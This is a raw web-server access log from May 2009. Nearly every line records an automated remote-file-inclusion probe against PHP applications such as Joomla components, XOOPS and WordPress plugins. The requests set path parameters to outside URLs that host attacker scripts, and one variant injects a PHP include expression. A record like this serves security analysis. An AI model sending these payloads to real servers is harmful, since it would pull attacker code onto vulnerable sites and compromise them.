61.109.245.179 - - [28/May/2009:09:31:07 -0500] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:31:07 -0500] "GET ///include/print_category.php?setup[use_category]=1&dir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:31:07 -0500] "GET /logs/access_log.1238803200///include/print_category.php?setup[use_category]=1&dir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:31:09 -0500] "GET ///include/print_category.php?setup[use_category]=1&dir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:31:09 -0500] "GET /logs/access_log.1238803200///include/print_category.php?setup[use_category]=1&dir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:31:09 -0500] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:09:31:35 -0500] "GET /logs/errors.php?error=http://208.98.22.241/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
207.213.245.215 - - [28/May/2009:09:31:38 -0500] "GET /errors.php?error=http://208.98.22.241/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
58.227.193.198 - - [28/May/2009:09:33:49 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
58.227.193.198 - - [28/May/2009:09:33:49 -0500] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
58.227.193.198 - - [28/May/2009:09:33:49 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:09:35:18 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:09:35:18 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:09:35:19 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
58.227.193.198 - - [28/May/2009:09:35:58 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
203.151.233.72 - - [28/May/2009:09:37:36 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
203.151.233.72 - - [28/May/2009:09:37:39 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
203.151.233.72 - - [28/May/2009:09:37:39 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
203.151.233.72 - - [28/May/2009:09:37:39 -0500] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:37:53 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:37:57 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:37:57 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:37:57 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:39:19 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:39:19 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:39:19 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:09:39:19 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:09:41:09 -0500] "GET /logs/access_log.1235952000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
66.219.99.129 - - [28/May/2009:09:41:49 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:09:41:49 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
85.17.162.28 - - [28/May/2009:09:45:41 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:09:45:41 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:09:45:41 -0500] "GET /logs/access_log.1242432000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 373 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:09:45:58 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:09:45:58 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:09:46:01 -0500] "GET /logs/access_log.1242432000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 373 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:09:46:07 -0500] "GET /logs/access_log.1242086400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 373 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:09:46:27 -0500] "GET /logs/access_log.1242086400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 373 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:09:47:37 -0500] "GET /logs/access_log.1242432000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:09:47:37 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:09:47:37 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:09:48:43 -0500] "GET /logs/access_log.1242086400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:49:52 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/galeria/mawar.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:49:52 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/galeria/mawar.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:49:54 -0500] "GET /logs/access_log.1238025600/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/galeria/mawar.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:50:10 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:50:10 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:50:11 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:50:34 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:50:34 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:50:35 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:51:56 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:52:00 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:52:04 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.186.1.54 - - [28/May/2009:09:53:08 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 307 "-""Mozilla/5.0"
89.186.1.54 - - [28/May/2009:09:53:08 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.186.1.54 - - [28/May/2009:09:53:08 -0500] "GET /logs/access_log.1233619200///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 329 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:53:15 -0500] "GET /logs/access_log.1236643200/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/galeria/mawar.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.233.22.209 - - [28/May/2009:09:53:48 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 191101 "-""libwww-perl/5.79"
211.233.22.209 - - [28/May/2009:09:53:48 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
89.186.1.54 - - [28/May/2009:09:55:31 -0500] "GET /logs/access_log.1238889600///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.7.201.86 - - [28/May/2009:09:57:10 -0500] "GET /logs///?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 191101 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.7.201.86 - - [28/May/2009:09:57:10 -0500] "GET ///?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
122.147.76.67 - - [28/May/2009:09:58:26 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
218.249.36.194 - - [28/May/2009:09:58:35 -0500] "GET /logs/access_log.1242432000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:09:58:35 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:09:58:35 -0500] "GET /logs/access_log.1242086400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:09:58:35 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:59:45 -0500] "GET /?custompluginfile[]=http://www.camaramunicipaluniao.com.br/galeria/mawar.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:59:46 -0500] "GET /logs/?custompluginfile[]=http://www.camaramunicipaluniao.com.br/galeria/mawar.txt? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:09:59:47 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://www.camaramunicipaluniao.com.br/galeria/mawar.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.7.201.86 - - [28/May/2009:09:59:51 -0500] "GET /logs///?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 191101 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.7.201.86 - - [28/May/2009:09:59:51 -0500] "GET ///?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
121.165.73.157 - - [28/May/2009:09:59:58 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
121.165.73.157 - - [28/May/2009:09:59:58 -0500] "GET /logs/access_log.1242432000//?_SERVER[DOCUMENT_ROOT]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.165.73.157 - - [28/May/2009:10:00:00 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 200 191100 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:10:00:47 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://www.camaramunicipaluniao.com.br/galeria/mawar.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:10:00:47 -0500] "GET /?custompluginfile[]=http://www.camaramunicipaluniao.com.br/galeria/mawar.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:10:00:47 -0500] "GET /logs/?custompluginfile[]=http://www.camaramunicipaluniao.com.br/galeria/mawar.txt? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
66.7.201.86 - - [28/May/2009:10:03:06 -0500] "GET /logs///?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 191101 "-""libwww-perl/5.826"
66.7.201.86 - - [28/May/2009:10:03:06 -0500] "GET ///?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.826"
66.7.201.86 - - [28/May/2009:10:03:07 -0500] "GET /logs///?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 191101 "-""libwww-perl/5.826"
66.7.201.86 - - [28/May/2009:10:03:07 -0500] "GET ///?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.826"
85.119.154.129 - - [28/May/2009:10:03:42 -0500] "GET /logs//errors.php?error=http://www.finance-911.com/errors.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.231.42.152 - - [28/May/2009:10:03:43 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
85.119.154.129 - - [28/May/2009:10:03:43 -0500] "GET //errors.php?error=http://www.finance-911.com/errors.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.231.42.152 - - [28/May/2009:10:03:43 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
207.182.143.50 - - [28/May/2009:10:04:55 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:10:05:01 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:10:05:21 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.219.99.129 - - [28/May/2009:10:05:45 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:05:45 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.130.29.11 - - [28/May/2009:10:06:47 -0500] "GET /logs/access_log.1242432000//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:10:06:47 -0500] "GET //skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:10:06:48 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:10:06:55 -0500] "GET /logs/access_log.1242172800//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.219.99.129 - - [28/May/2009:10:08:35 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:08:35 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:09:07 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:09:07 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:09:12 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:09:13 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
59.24.49.35 - - [28/May/2009:10:10:14 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:10:10:14 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:10:10:15 -0500] "GET /logs/access_log.1239926400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
212.97.132.101 - - [28/May/2009:10:10:36 -0500] "GET /logs/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 283 "-""libwww-perl/5.53"
212.97.132.101 - - [28/May/2009:10:10:36 -0500] "GET /SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 278 "-""libwww-perl/5.53"
210.188.218.248 - - [28/May/2009:10:10:37 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:10:38 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:11:02 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:11:02 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:11:15 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:11:16 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:11:19 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:11:20 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
212.97.132.101 - - [28/May/2009:10:11:28 -0500] "GET /logs/index.php?pagina=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 285 "-""libwww-perl/5.53"
212.97.132.101 - - [28/May/2009:10:11:28 -0500] "GET /index.php?pagina=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 280 "-""libwww-perl/5.53"
210.188.218.41 - - [28/May/2009:10:13:05 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
